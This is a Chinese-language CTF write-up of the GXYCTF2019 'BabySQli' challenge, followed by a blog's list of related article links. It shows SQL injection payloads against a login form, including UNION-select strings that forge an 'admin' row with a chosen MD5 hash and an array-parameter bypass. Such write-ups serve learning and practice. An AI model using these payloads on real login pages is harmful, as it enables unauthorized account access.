[GXYCTF2019]BabySQli

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!

我看到是个黑盒先想着搞一份源码
在这里插入图片描述
我dirsearch明明扫到了.git,算了直接注入试试看
随便输入了两个东西,发现源码有提示
在这里插入图片描述
全是大写字母,base32解码一下,然后再base64解码
在这里插入图片描述
在这里插入图片描述

select * from user where username = '$name'
找到注入点name

我第一个写的是这样的

1'union(select)1,2,3'

结果不行,后面把()删除了就可以了

1'union select 1,(select group_concat(schema_name) from infoorrmation_schema.schemata),3'

写联合注入,不行,没有绕过白名单
在这里插入图片描述
换个思路,不爆数据了,我们不是要登录嘛,题目提示密码被md5了
本地尝试一下
在这里插入图片描述
成功了,md5我们直接用数组绕过即可
在这里插入图片描述
不准用?
后面想了一下数组绕过的原理是md5无法正确处理那写个NULL

name=1'union select 1,'admin',NULL'&pw[]=123

或者那就在线加密一下

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b''&pw=1
我这么写回显说是错的但是我想着应该不会错,代入原句
select * from user where username = '1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'''

多了一个空所以应该不能正常解析,我们换成闭合

name=1'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'--+&pw=1

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-14 11:00:02       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-14 11:00:02       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-14 11:00:02       57 阅读
  4. Python语言-面向对象

    2024-07-14 11:00:02       68 阅读

热门阅读

  1. 山洪灾害研究

    2024-07-14 11:00:02       25 阅读
  2. 小白C语言基础详解:函数

    2024-07-14 11:00:02       23 阅读
  3. 【2024最新】C++扫描线算法介绍+实战例题

    2024-07-14 11:00:02       23 阅读
  4. 基于MacOS系统Sonoma 14.5的SSH服务禁止密码登录

    2024-07-14 11:00:02       23 阅读
  5. 【Druid 未授权访问漏洞】解决办法

    2024-07-14 11:00:02       23 阅读
  6. 电子版pdf格式标书怎么加盖公章?

    2024-07-14 11:00:02       28 阅读
  7. not enough information C#

    2024-07-14 11:00:02       21 阅读
  8. python 网络爬虫

    2024-07-14 11:00:02       24 阅读
  9. Writing Bazel rules: simple binary rule

    2024-07-14 11:00:02       18 阅读